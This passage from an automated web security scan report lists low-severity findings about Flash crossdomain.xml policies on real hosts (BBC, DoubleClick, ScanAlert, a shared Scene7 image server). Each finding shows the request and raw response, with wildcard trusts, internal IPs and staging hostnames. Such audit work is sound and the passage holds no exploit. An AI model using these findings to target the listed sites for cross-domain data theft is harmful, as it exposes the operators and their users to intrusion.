   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.59. http://gnc.imageg.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gnc.imageg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gnc.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:42 GMT
Date: Mon, 16 May 2011 01:57:42 GMT
Content-Length: 405
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-acce
...[SNIP]...
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.60. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:45:15 GMT
Expires: Mon, 16 May 2011 10:45:15 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 54640
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.61. http://images.scanalert.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.scanalert.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 02:06:37 GMT
Connection: close
Cache-Control: private

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.62. http://images3.pacsun.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses wildcards to specify allowed domains, and allows access from a large number of specific other domains. The policy is evidently shared by many unrelated tenants of the same image-serving platform. It also lists private (RFC 1918) and loopback addresses, host:port values and whitespace-padded entries, which disclose internal hostnames and addressing and are unlikely to behave as intended.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Several of the wildcards here cover multi-tenant third-party services (for example *.cloudfront.net), where the operator cannot vet every site that may be served under the wildcard.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: images3.pacsun.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
